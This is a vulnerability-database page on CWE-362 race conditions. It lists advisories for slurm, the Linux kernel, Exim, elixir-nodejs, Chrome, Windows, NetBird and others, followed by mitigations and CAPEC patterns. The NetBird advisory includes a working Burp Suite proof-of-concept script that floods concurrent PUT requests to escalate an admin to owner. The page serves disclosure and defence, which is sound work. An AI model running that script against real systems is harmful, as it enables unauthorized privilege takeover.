Common Weakness Enumeration

CWE-362

Allowed-with-Review

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Abstraction: Class · Status: Draft

The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

2900 vulnerabilities reference this CWE, most recent first.

GHSA-RW8F-7P48-8M3H

Vulnerability from github – Published: 2022-09-08 00:00 – Updated: 2022-09-14 00:00
VLAI
Details

A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-31251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-276",
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-07T09:15:00Z",
    "severity": "HIGH"
  },
  "details": "A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.",
  "id": "GHSA-rw8f-7p48-8m3h",
  "modified": "2022-09-14T00:00:41Z",
  "published": "2022-09-08T00:00:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31251"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.suse.com/show_bug.cgi?id=1201674"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RW9R-WQX2-72F7

Vulnerability from github – Published: 2024-06-25 15:31 – Updated: 2025-09-17 18:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

bonding: fix oops during rmmod

"rmmod bonding" causes an oops ever since commit cc317ea3d927 ("bonding: remove redundant NULL check in debugfs function"). Here are the relevant functions being called:

bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root); bonding_debug_root = NULL; <--------- SET TO NULL HERE bond_netlink_fini() rtnl_link_unregister() __rtnl_link_unregister() unregister_netdevice_many_notify() bond_uninit() bond_debug_unregister() (commit removed check for bonding_debug_root == NULL) debugfs_remove() simple_recursive_removal() down_write() -> OOPS

However, reverting the bad commit does not solve the problem completely because the original code contains a race that could cause the same oops, although it was much less likely to be triggered unintentionally:

CPU1 rmmod bonding bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root);

CPU2 echo -bond0 > /sys/class/net/bonding_masters bond_uninit() bond_debug_unregister() if (!bonding_debug_root)

CPU1 bonding_debug_root = NULL;

So do NOT revert the bad commit (since the removed checks were racy anyway), and instead change the order of actions taken during module removal. The same oops can also happen if there is an error during module init, so apply the same fix there.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39296"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-25T15:15:14Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: fix oops during rmmod\n\n\"rmmod bonding\" causes an oops ever since commit cc317ea3d927 (\"bonding:\nremove redundant NULL check in debugfs function\").  Here are the relevant\nfunctions being called:\n\nbonding_exit()\n  bond_destroy_debugfs()\n    debugfs_remove_recursive(bonding_debug_root);\n    bonding_debug_root = NULL; \u003c--------- SET TO NULL HERE\n  bond_netlink_fini()\n    rtnl_link_unregister()\n      __rtnl_link_unregister()\n        unregister_netdevice_many_notify()\n          bond_uninit()\n            bond_debug_unregister()\n              (commit removed check for bonding_debug_root == NULL)\n              debugfs_remove()\n              simple_recursive_removal()\n                down_write() -\u003e OOPS\n\nHowever, reverting the bad commit does not solve the problem completely\nbecause the original code contains a race that could cause the same\noops, although it was much less likely to be triggered unintentionally:\n\nCPU1\n  rmmod bonding\n    bonding_exit()\n      bond_destroy_debugfs()\n        debugfs_remove_recursive(bonding_debug_root);\n\nCPU2\n  echo -bond0 \u003e /sys/class/net/bonding_masters\n    bond_uninit()\n      bond_debug_unregister()\n        if (!bonding_debug_root)\n\nCPU1\n        bonding_debug_root = NULL;\n\nSo do NOT revert the bad commit (since the removed checks were racy\nanyway), and instead change the order of actions taken during module\nremoval.  The same oops can also happen if there is an error during\nmodule init, so apply the same fix there.",
  "id": "GHSA-rw9r-wqx2-72f7",
  "modified": "2025-09-17T18:31:15Z",
  "published": "2024-06-25T15:31:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39296"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/a45835a0bb6ef7d5ddbc0714dd760de979cb6ece"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/cf48aee81103ca06d09d73d33fb72f1191069aa6"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/f07224c16678a8af54ddc059b3d2d51885d7f35e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RWCH-4JCH-MJX7

Vulnerability from github – Published: 2022-05-14 02:44 – Updated: 2022-05-14 02:44
VLAI
Details

transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-2024"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-06-07T17:12:00Z",
    "severity": "MODERATE"
  },
  "details": "transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.",
  "id": "GHSA-rwch-4jch-mjx7",
  "modified": "2022-05-14T02:44:33Z",
  "published": "2022-05-14T02:44:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2024"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=600097"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/59042"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-06/0079.html"
    },
    {
      "type": "WEB",
      "url": "http://bugs.exim.org/show_bug.cgi?id=989"
    },
    {
      "type": "WEB",
      "url": "http://lists.exim.org/lurker/message/20100524.175925.9a69f755.en.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042587.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042613.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/40019"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/40123"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/43243"
    },
    {
      "type": "WEB",
      "url": "http://vcs.exim.org/viewvc/exim/exim-doc/doc-txt/ChangeLog?view=markup\u0026pathrev=exim-4_72_RC2"
    },
    {
      "type": "WEB",
      "url": "http://vcs.exim.org/viewvc/exim/exim-src/src/transports/appendfile.c?r1=1.25\u0026r2=1.26"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/511653/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/40454"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-1060-1"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2010/1402"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2011/0364"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-RWCR-RPCC-3G9M

Vulnerability from github – Published: 2026-03-26 18:23 – Updated: 2026-03-27 21:49
VLAI
Summary
elixir-nodejs has Cross-User Data Leakage or Information Disclosure due to Worker Protocol Race Condition
Details

Impact

This vulnerability results in Cross-User Data Leakage or Information Disclosure due to a race condition in the worker protocol.

The lack of request-response correlation creates a "stale response" vulnerability. Because the worker does not verify which request a response belongs to, it may return the next available data in the buffer to an unrelated caller.

In high-throughput environments where the library processes sensitive user data (e.g., PII, authentication tokens, or private records), a timeout or high concurrent load can cause Data A (belonging to User A) to be returned to User B.

This may lead to unauthorized information disclosure that is difficult to trace, as the application may not throw an error but instead provide "valid-looking" yet entirely incorrect and private data to the wrong session.

Patches

fixed in v3.1.4

Resources

https://github.com/revelrylabs/elixir-nodejs/issues/100

https://github.com/revelrylabs/elixir-nodejs/pull/105

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "nodejs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33872"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:23:01Z",
    "nvd_published_at": "2026-03-27T20:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThis vulnerability results in Cross-User Data Leakage or Information Disclosure due to a race condition in the worker protocol.\n\nThe lack of request-response correlation creates a \"stale response\" vulnerability. Because the worker does not verify which request a response belongs to, it may return the next available data in the buffer to an unrelated caller.\n\nIn high-throughput environments where the library processes sensitive user data (e.g., PII, authentication tokens, or private records), a timeout or high concurrent load can cause Data A (belonging to User A) to be returned to User B.\n\nThis may lead to unauthorized information disclosure that is difficult to trace, as the application may not throw an error but instead provide \"valid-looking\" yet entirely incorrect and private data to the wrong session.\n\n### Patches\n\nfixed in v3.1.4\n\n### Resources\nhttps://github.com/revelrylabs/elixir-nodejs/issues/100\n\nhttps://github.com/revelrylabs/elixir-nodejs/pull/105",
  "id": "GHSA-rwcr-rpcc-3g9m",
  "modified": "2026-03-27T21:49:01Z",
  "published": "2026-03-26T18:23:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/revelrylabs/elixir-nodejs/security/advisories/GHSA-rwcr-rpcc-3g9m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33872"
    },
    {
      "type": "WEB",
      "url": "https://github.com/revelrylabs/elixir-nodejs/issues/100"
    },
    {
      "type": "WEB",
      "url": "https://github.com/revelrylabs/elixir-nodejs/pull/105"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/revelrylabs/elixir-nodejs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/revelrylabs/elixir-nodejs/releases/tag/v3.1.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "elixir-nodejs has Cross-User Data Leakage or Information Disclosure due to Worker Protocol Race Condition"
}

GHSA-RX4W-HX56-763J

Vulnerability from github – Published: 2022-05-13 01:24 – Updated: 2022-05-13 01:24
VLAI
Details

Race condition in the console implementation in Google Chrome before 6.0.472.59 has unspecified impact and attack vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-3412"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-09-16T21:00:00Z",
    "severity": "HIGH"
  },
  "details": "Race condition in the console implementation in Google Chrome before 6.0.472.59 has unspecified impact and attack vectors.",
  "id": "GHSA-rx4w-hx56-763j",
  "modified": "2022-05-13T01:24:50Z",
  "published": "2022-05-13T01:24:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3412"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7354"
    },
    {
      "type": "WEB",
      "url": "http://code.google.com/p/chromium/issues/detail?id=51919"
    },
    {
      "type": "WEB",
      "url": "http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-RX5X-FC3W-5FC6

Vulnerability from github – Published: 2026-01-13 18:31 – Updated: 2026-01-13 18:31
VLAI
Details

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-20867"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-13T18:16:16Z",
    "severity": "HIGH"
  },
  "details": "Concurrent execution using shared resource with improper synchronization (\u0027race condition\u0027) in Windows Management Services allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-rx5x-fc3w-5fc6",
  "modified": "2026-01-13T18:31:09Z",
  "published": "2026-01-13T18:31:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20867"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20867"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RXMP-8H9V-56CX

Vulnerability from github – Published: 2026-04-01 21:03 – Updated: 2026-04-01 21:03
VLAI
Summary
NetBird has Race Condition on UpdateUser Function, Resulting in Privilege Escalation From Admin to Owner
Details

Summary

A race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.

Details

The vulnerability exists in the updateUser function, which is connected to the /users/{userId} PUT request. This function then calls the SaveOrAddUsers function, which checks the user's permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called initiatorUser.

SaveOrAddUsers Function

Location: netbird/management/server/user.go — Line 556

SaveOrAddUsers function code showing the two separate permission checks

Afterwards, the validateUserUpdate function is called, which checks if the initiator has permission to update that specific user's role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.

validateUserUpdate Function

Location: netbird/management/server/user.go — Line 862

validateUserUpdate function code showing the insufficient permission validation logic

In summary, if the initiator's permission is admin at the first check and gets dropped to user at the second check, the initiator can update a user to owner.

Proof of Concept

It is possible to create the following attack:

The initiator (old_admin) creates two different accounts — one with a user role and another with an admin role. These will be referred to as new_user and new_admin from here on.

Two different requests are needed:

  1. Request 1 — Using new_admin's JWT, a request is created that changes old_admin's role to user.
  2. Request 2 — Using old_admin's JWT, a request is created that changes new_user's role to owner.

Both requests need valid user IDs and auto_groups group IDs. They should be sent simultaneously without waiting for prior requests to return.

There is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using 5 copies of Request 1 and 100 copies of Request 2 without waiting for any request to complete. The request that updated the role to owner returned 500 status codes instead of 403, which when retried returned 200 and successfully applied the update.

The following Burp Suite race condition script was used. Note that it may still require multiple tries, and the old_admin account role must be reset to admin after every failed attempt.

import time

def queueRequests(target, wordlists):

    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=100,
        requestsPerConnection=100,
        pipeline=False
    )

    # Request 1
    req1 = """PUT /api/users/{OLD_ADMIN_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {NEW_ADMIN_TOKEN}
Content-Length: 73
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"user","auto_groups":[GROUP_ID],"is_blocked":false}"""

    # Request 2
    req2 = """PUT /api/users/{NEW_USER_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {OLD_ADMIN_TOKEN}
Content-Length: 52
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"owner","auto_groups":[],"is_blocked":false}"""

    # Send first request
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)

    # Send second request
    for i in range(100):
        engine.queue(req2)


def handleResponse(req, interesting):
    table.add(req)

Impact

An attacker with an admin account on the self-hosted NetBird management application v0.65.2 or lower can escalate to owner privileges.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.65.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/netbirdio/netbird"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.65.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:03:00Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.\n\n## Details\n\nThe vulnerability exists in the `updateUser` function, which is connected to the `/users/{userId}` PUT request. This function then calls the `SaveOrAddUsers` function, which checks the user\u0027s permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called `initiatorUser`.\n\n### `SaveOrAddUsers` Function\n\n**Location:** `netbird/management/server/user.go` \u2014 Line 556\n\n![SaveOrAddUsers function code showing the two separate permission checks](https://github.com/user-attachments/assets/821e79a2-ad3e-45d7-a952-daf5422c1801)\n\nAfterwards, the `validateUserUpdate` function is called, which checks if the initiator has permission to update that specific user\u0027s role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.\n\n### `validateUserUpdate` Function\n\n**Location:** `netbird/management/server/user.go` \u2014 Line 862\n\n![validateUserUpdate function code showing the insufficient permission validation logic](https://github.com/user-attachments/assets/a7e7f2df-ee4c-45b4-9b4d-c71c605dbaaa)\n\nIn summary, if the initiator\u0027s permission is **admin** at the first check and gets dropped to **user** at the second check, the initiator can update a user to **owner**.\n\n## Proof of Concept\n\nIt is possible to create the following attack:\n\nThe initiator (`old_admin`) creates two different accounts \u2014 one with a **user** role and another with an **admin** role. These will be referred to as `new_user` and `new_admin` from here on.\n\nTwo different requests are needed:\n\n1. **Request 1** \u2014 Using `new_admin`\u0027s JWT, a request is created that changes `old_admin`\u0027s role to **user**.\n2. **Request 2** \u2014 Using `old_admin`\u0027s JWT, a request is created that changes `new_user`\u0027s role to **owner**.\n\nBoth requests need valid user IDs and `auto_groups` group IDs. They should be sent simultaneously without waiting for prior requests to return.\n\nThere is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using **5 copies of Request 1** and **100 copies of Request 2** without waiting for any request to complete. The request that updated the role to owner returned **500** status codes instead of **403**, which when retried returned **200** and successfully applied the update.\n\nThe following Burp Suite race condition script was used. Note that it may still require multiple tries, and the `old_admin` account role must be reset to **admin** after every failed attempt.\n\n```python\nimport time\n\ndef queueRequests(target, wordlists):\n\n    engine = RequestEngine(\n        endpoint=target.endpoint,\n        concurrentConnections=100,\n        requestsPerConnection=100,\n        pipeline=False\n    )\n\n    # Request 1\n    req1 = \"\"\"PUT /api/users/{OLD_ADMIN_USERID} HTTP/2\nHost: CHANGE_WITH_HOST\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0\nAccept: application/json\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/json\nAuthorization: Bearer {NEW_ADMIN_TOKEN}\nContent-Length: 73\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\n\n{\"role\":\"user\",\"auto_groups\":[GROUP_ID],\"is_blocked\":false}\"\"\"\n\n    # Request 2\n    req2 = \"\"\"PUT /api/users/{NEW_USER_USERID} HTTP/2\nHost: CHANGE_WITH_HOST\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0\nAccept: application/json\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/json\nAuthorization: Bearer {OLD_ADMIN_TOKEN}\nContent-Length: 52\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\n\n{\"role\":\"owner\",\"auto_groups\":[],\"is_blocked\":false}\"\"\"\n\n    # Send first request\n    engine.queue(req1)\n    engine.queue(req1)\n    engine.queue(req1)\n    engine.queue(req1)\n    engine.queue(req1)\n\n    # Send second request\n    for i in range(100):\n        engine.queue(req2)\n\n\ndef handleResponse(req, interesting):\n    table.add(req)\n```\n\n## Impact\n\nAn attacker with an admin account on the self-hosted NetBird management application **v0.65.2 or lower** can escalate to owner privileges.",
  "id": "GHSA-rxmp-8h9v-56cx",
  "modified": "2026-04-01T21:03:00Z",
  "published": "2026-04-01T21:03:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netbirdio/netbird/security/advisories/GHSA-rxmp-8h9v-56cx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netbirdio/netbird"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NetBird has Race Condition on UpdateUser Function, Resulting in Privilege Escalation From Admin to Owner"
}

GHSA-RXPR-5X8P-2XF5

Vulnerability from github – Published: 2023-05-10 00:30 – Updated: 2024-04-04 03:58
VLAI
Details

An improper authentication vulnerability exists in Avalanche Premise versions 6.3.x and below that could allow an attacker to gain access to the server by registering to receive messages from the server and perform an authentication bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28125"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-09T22:15:09Z",
    "severity": "MODERATE"
  },
  "details": "An improper authentication vulnerability exists in Avalanche Premise versions 6.3.x and below that could allow an attacker to gain access to the server by registering to receive messages from the server and perform an authentication bypass.",
  "id": "GHSA-rxpr-5x8p-2xf5",
  "modified": "2024-04-04T03:58:07Z",
  "published": "2023-05-10T00:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28125"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/ZDI-CAN-17729-CVE-2023-28125-Bug-958437-ZDI-CAN-17729-Ivanti-Avalanche-InfoRail-Authentication-Bypass-Vulnerability?language=en_US"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RXWR-WPPX-RXCC

Vulnerability from github – Published: 2022-05-14 02:10 – Updated: 2022-05-14 02:10
VLAI
Details

Race condition in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the plug-in paint buffer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-2880"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-09-26T10:56:00Z",
    "severity": "HIGH"
  },
  "details": "Race condition in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the plug-in paint buffer.",
  "id": "GHSA-rxwr-wppx-rxcc",
  "modified": "2022-05-14T02:10:46Z",
  "published": "2022-05-14T02:10:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2880"
    },
    {
      "type": "WEB",
      "url": "https://code.google.com/p/chromium/issues/detail?id=139462"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78838"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15776"
    },
    {
      "type": "WEB",
      "url": "http://googlechromereleases.blogspot.com/2012/09/stable-channel-update_25.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00012.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-V242-2PG6-CFQQ

Vulnerability from github – Published: 2025-11-10 21:30 – Updated: 2025-11-10 21:30
VLAI
Details

Race in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-10T20:15:37Z",
    "severity": "HIGH"
  },
  "details": "Race in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
  "id": "GHSA-v242-2pg6-cfqq",
  "modified": "2025-11-10T21:30:35Z",
  "published": "2025-11-10T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12432"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop_28.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/439522866"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance.

Mitigation
Architecture and Design

Use thread-safe capabilities such as the data access abstraction in Spring.

Mitigation
Architecture and Design
  • Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.
  • Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400).
Mitigation
Implementation

When using multithreading and operating on shared variables, only use thread-safe functions.

Mitigation
Implementation

Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write.

Mitigation
Implementation

Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412.

Mitigation
Implementation

Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization.

Mitigation
Implementation

Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop.

Mitigation
Implementation

Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help.

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

CAPEC-26: Leveraging Race Conditions

The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.

CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions

This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.